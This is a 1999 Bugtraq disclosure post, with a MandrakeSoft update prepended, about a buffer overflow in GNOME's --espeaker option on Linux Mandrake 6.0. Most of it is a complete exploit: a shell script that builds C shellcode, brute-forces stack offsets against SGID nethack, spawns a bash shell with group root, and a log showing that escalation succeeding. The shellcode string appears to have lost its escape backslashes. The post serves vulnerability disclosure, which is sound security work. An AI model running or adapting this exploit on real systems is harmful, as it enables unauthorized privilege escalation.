Linux GNOME exploit

Update: Chmouel Boudjnah of MandrakeSoft
says:

Humm it’s not a RedHat bugs but a Mandrake one.

The fixed package is available from our updates mirror, see
:

http://www.linux-mandrake.com/en/fupdates.php3

or launch MandrakeUpdate.

Nota the security is only with 6.0 version, since 6.1 the
package was removed.

We advice to remove completely the package from your system if
you are maniac of security (and who aren’t ?).

    From: Brock Tellier 
 Subject: Linux GNOME exploit
    Date: Thu, 23 Sep 1999 18:36:18 -0500
      To: BUGTRAQ@SECURITYFOCUS.COM

Greetings,

Virtually any program using the GNOME libraries is vulnerable to
a buffer overflow attack. The attack comes in the form:

/path/to/gnome/prog –enable-sound –espeaker=$80bytebuffer

The following exploit should work against any GNOME program,
though I tried it on (the irony) /usr/games/nethack, which is SGID
root by default on RH6.0. An attack on any program will look
something like this:

[xnec@redhack gnox]$ uname -a; cat /etc/redhat-release; id
Linux redhack 2.2.9-19mdk #1 Wed May 19 19:53:00 GMT 1999 i686
unknown
Linux Mandrake release 6.0 (Venus)
uid=501(xnec) gid=501(xnec) groups=501(xnec)
[xnec@redhack gnox]$ ./gnox.sh
Building /tmp/gnox.c…
…done!
Building /tmp/gn.c…
…done!
Compiling /tmp/gnox…
…done!
Compiling /tmp/gn…
…done!
Launching attack…

… pages and pages of segfaults

Generic GNOME exploit for Linux x86
Brock Tellier btellier@webley.com

Using addr: 0xbffff988  buflen:90  offset:208
Can't resolve host name "ë^1AFF
                                                                     °
                                                                      óV

I1UØ@IèÜÿÿÿ/tmp/gnùÿ¿ùÿ¿Xúÿ¿Z”!

before: uid=501, euid=501, gid=501, egid=0
after: uid=501, euid=501, gid=0, egid=0
[xnec@redhack gnomehack]$ id
uid=501(xnec) gid=0(root) groups=501(xnec)

Brock Tellier
UNIX Systems Administrator
Webley Systems
http://www.webley.com

--- gnox.sh ---
#!/bin/bash
# Generic exploit for GNOME apps under Linux x86
# Our overflowed buffer is just 80 bytes so we'll have to get our
settings
# just so.  Hence the shell script.
#
# This should work against any su/gid GNOME program.  The only one that
comes
# with RH6.0 that is su/gid root is (the irony is killing me) nethack.
#
# Change the /usr/games/nethack statement in the while loop below to
exploit
# a different program.
#
# -Brock Tellier btellier@webley.com

echo "Building /tmp/gnox.c..."
cat > /tmp/gnox.c <<EOF
/*
 * Generic GNOME overflow exploit for Linux x86, tested on RH6.0
 * Will work against any program using the GNOME libraries in the form
 * Keep your BUFSIZ at 90 and only modify your offset
 *
 */


#include <stdlib.h>
#include <stdio.h>

char gnoshell[]= /* Generic Linux x86 shellcode modified to run our
program */
"xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b"
"x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd"
"x80xe8xdcxffxffxff/tmp/gn";

#define LEN 120
#define BUFLEN 90 /* no need to change this */
#define NOP 0x90
#define DEFAULT_OFFSET 300

unsigned long get_sp(void) {

__asm__("movl %esp, %eax");

}

void main(int argc, char *argv[]) {

int offset, i;
int buflen = BUFLEN;
long int addr;
char buf[BUFLEN];
char gnobuf[LEN];
if(argc > 2) {
  fprintf(stderr, "Error: Usage: %s <offset>n", argv[0]);
  exit(0);
}
 else if (argc == 2){
   offset=atoi(argv[1]);
 }
 else {
   offset=DEFAULT_OFFSET;
 }


addr=get_sp();

fprintf(stderr, "Generic GNOME exploit for Linux x86n");
fprintf(stderr, "Brock Tellier btellier@webley.comnn");
fprintf(stderr, "Using addr: 0x%x  buflen:%d  offset:%dn", addr-offset,
buflen, offset);

memset(buf,NOP,buflen);
memcpy(buf+35,gnoshell,strlen(gnoshell));
for(i=35+strlen(gnoshell);i<buflen-4;i+=4)
        *(int *)&buf[i]=addr-offset;

sprintf(gnobuf, "--enable-sound --espeaker=%s", buf);
for(i=0;i<strlen(gnobuf);i++)
        putchar(gnobuf[i]);

}
EOF

echo "...done!"

echo "Building /tmp/gn.c..."

cat > /tmp/gn.c <<EOF
#include <unistd.h>

void main() {
  printf("before: uid=%d, euid=%d, gid=%d, egid=%dn", getuid(),
geteuid(), getgid(), getegid());

  setreuid(geteuid(), geteuid());
  setregid(getegid(), getegid());

  printf("after: uid=%d, euid=%d, gid=%d, egid=%dn", getuid(),
geteuid(), getgid(), getegid());

  system("/bin/bash");
}
EOF

echo "...done!"

echo "Compiling /tmp/gnox..."
gcc -o /tmp/gnox /tmp/gnox.c
echo "...done!"

echo "Compiling /tmp/gn..."
gcc -o /tmp/gn /tmp/gn.c
echo "...done!"

echo "Launching attack..."

offset=0

while [ $offset -lt 10000 ]; do
    /usr/games/nethack `/tmp/gnox $offset`
    offset=`expr $offset + 4`
done

echo "...done!"

------